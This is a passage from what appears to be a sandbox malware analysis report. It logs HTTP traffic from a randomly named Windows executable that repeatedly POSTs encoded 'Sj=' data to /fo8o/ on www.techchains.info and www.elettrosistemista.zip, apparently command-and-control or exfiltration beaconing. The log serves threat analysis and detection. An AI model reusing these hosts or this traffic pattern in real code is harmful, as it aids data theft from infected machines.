                                                                                    Data Ascii: nd:before{border-radius:50%}input:checked+.switch__slider{background-color:#007bff}input:focus+.switch__slider{box-shadow:0 0 1px #007bff}input:checked+.switch__slider:before{-webkit-transform:translateX(26px);-ms-transform:translateX(26px);tr


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    13192.168.2.45001666.29.149.46803300C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 19, 2024 06:44:04.608711004 CET776OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.techchains.info
                                                                                    Origin: http://www.techchains.info
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 199
                                                                                    Referer: http://www.techchains.info/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 53 6a 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 49 2b 53 2f 61 53 52 75 44 6a 49 4c 65 52 30 63 34 56 6b 6a 6a 56 4e 64 79 32 5a 68 6a 50 75 73 66 51 3d 3d
                                                                                    Data Ascii: Sj=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXI+S/aSRuDjILeR0c4VkjjVNdy2ZhjPusfQ==
                                                                                    Dec 19, 2024 06:44:05.842195988 CET637INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 19 Dec 2024 05:44:05 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 493
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    14192.168.2.45001766.29.149.46803300C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 19, 2024 06:44:07.265283108 CET796OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.techchains.info
                                                                                    Origin: http://www.techchains.info
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 219
                                                                                    Referer: http://www.techchains.info/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 53 6a 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 70 75 76 78 51 56 75 4d 54 6c 45 56 6d 4c 76 34 52 72 53 73 79 31 5a 71 7a 64 6e 4b 6a 59 2f 51 51 3d
                                                                                    Data Ascii: Sj=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVpuvxQVuMTlEVmLv4RrSsy1ZqzdnKjY/QQ=
                                                                                    Dec 19, 2024 06:44:08.506069899 CET637INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 19 Dec 2024 05:44:08 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 493
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    15192.168.2.45001866.29.149.46803300C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 19, 2024 06:44:09.921848059 CET10878OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.techchains.info
                                                                                    Origin: http://www.techchains.info
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 10299
                                                                                    Referer: http://www.techchains.info/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 53 6a 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 59 57 44 7a 38 46 78 77 4e 31 67 46 4d 79 78 42 4d 2f 74 4e 50 62 42 6b 57 57 67 36 35 72 57 39 4f 68 53 34 37 52 2b 49 76 2f 74 6c 59 78 46 53 30 52 52 4d 7a 73 32 41 2b 4f 70 6a 76 75 49 4d 42 4c 6f 72 56 6b 36 6f 46 50 36 58 70 72 6d 36 76 4d 62 77 6e 74 34 44 51 71 68 38 63 4e 67 73 67 6b 32 32 38 6b 32 4c 35 50 6e 67 59 79 6f 4f 64 66 6c 6e 46 72 57 37 4d 33 4c 63 46 50 73 78 68 52 66 2b 2f 2f 44 34 64 63 54 77 61 4f 56 4c 68 76 33 65 43 55 5a 71 70 75 73 48 77 79 58 50 77 67 57 36 54 [TRUNCATED]
                                                                                    Data Ascii: Sj=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNnYWDz8FxwN1gFMyxBM/tNPbBkWWg65rW9OhS47R+Iv/tlYxFS0RRMzs2A+OpjvuIMBLorVk6oFP6Xprm6vMbwnt4DQqh8cNgsgk228k2L5PngYyoOdflnFrW7M3LcFPsxhRf+//D4dcTwaOVLhv3eCUZqpusHwyXPwgW6TuK70JeCi9ELbm/JHs5nEZNYt9gINRz/xk4saE+gyfNPVd3USkEHFWiwgLoCdyxMiCnCV8N7vp9jvHuYVFECizejIFUsj1L5awlRSArxkosu88jFosLjjCV7rQpRN0ORDusbVE2SNfVKz2OyNaNQdvD2CWu0KTn2b3qsWvBXgwId92/TbSN8occRSpiyYr1jezk5xorkS1szuFZ/RymGtg/8QkAbBDTGyV4RefsT9vhapIKaqQEEOoeKY/5ZP269UFz+h5ide/dT34BdS9mqqT2UIUly3+AMrUEY30rOFIix6vdECEKy5LB2rpiNOOSVaiXWCgixsCCORrIiVOr3P5e3OV9DPwPyAsbm89NL/G5GEi+zK+YkrbbMcdFfMu1NNykUJeOn8j6mvaCZ8viIlMthIq3jRhpa4WGktmqI9JGAiWfe3RTFf5UoLc/LRdG7NWrwQEHYRtULAb2RmPTJSIhRo3JF+TqzjwKDv6E6/m4JXZju0iG5ZlM4iBaYQ6BAN6HSGPTPiBOfNYSnFlpqkN5mTxHH3dRegdjc9HfvbUxICgg/Zv6i5Vjk5NQIjfwdN4cUtFDB6sbzMnctvq74A7LnkLpf6PVYILwp0uRFKRNJXdXxCqQHmxVOcJAofjqgMSHN/cmP/q8HxjOm4JN1IK4EIjTWHxURYWD [TRUNCATED]
                                                                                    Dec 19, 2024 06:44:11.162903070 CET637INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 19 Dec 2024 05:44:10 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 493
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    16192.168.2.45001966.29.149.46803300C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 19, 2024 06:44:12.580826998 CET506OUTGET /fo8o/?Sj=vefd0teQh+kbruh+h6aX8PBfjiL7oFyRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hd7w81ULHWk02cFWPIOqV4u3afmCGnKNzdpU=&K8tpX=HvRPZ2CX3 HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.techchains.info
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Dec 19, 2024 06:44:13.816999912 CET652INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 19 Dec 2024 05:44:13 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 493
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    17192.168.2.450020195.110.124.133803300C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 19, 2024 06:44:19.806196928 CET794OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.elettrosistemista.zip
                                                                                    Origin: http://www.elettrosistemista.zip
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 199
                                                                                    Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 53 6a 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 69 78 4e 59 78 49 4d 31 4a 74 4b 41 2f 57 70 73 58 50 78 74 43 78 4c 4c 67 4e 74 47 63 72 37 79 6e 77 3d 3d
                                                                                    Data Ascii: Sj=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCixNYxIM1JtKA/WpsXPxtCxLLgNtGcr7ynw==
                                                                                    Dec 19, 2024 06:44:21.115406990 CET367INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 19 Dec 2024 05:44:20 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 203
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    18192.168.2.450021195.110.124.133803300C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 19, 2024 06:44:22.492876053 CET814OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.elettrosistemista.zip
                                                                                    Origin: http://www.elettrosistemista.zip
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 219
                                                                                    Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 53 6a 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 76 34 39 4b 6b 79 52 6f 47 37 38 34 48 31 4a 4c 6b 48 36 72 2f 74 6c 72 79 79 4c 4b 47 4c 79 70 55 3d
                                                                                    Data Ascii: Sj=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6Qxv49KkyRoG784H1JLkH6r/tlryyLKGLypU=
                                                                                    Dec 19, 2024 06:44:23.770736933 CET367INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 19 Dec 2024 05:44:23 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 203
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    19192.168.2.450022195.110.124.133803300C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 19, 2024 06:44:25.141993046 CET10896OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.elettrosistemista.zip
                                                                                    Origin: http://www.elettrosistemista.zip
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 10299
                                                                                    Referer: http://www.elettrosistemista.zip/fo8o/
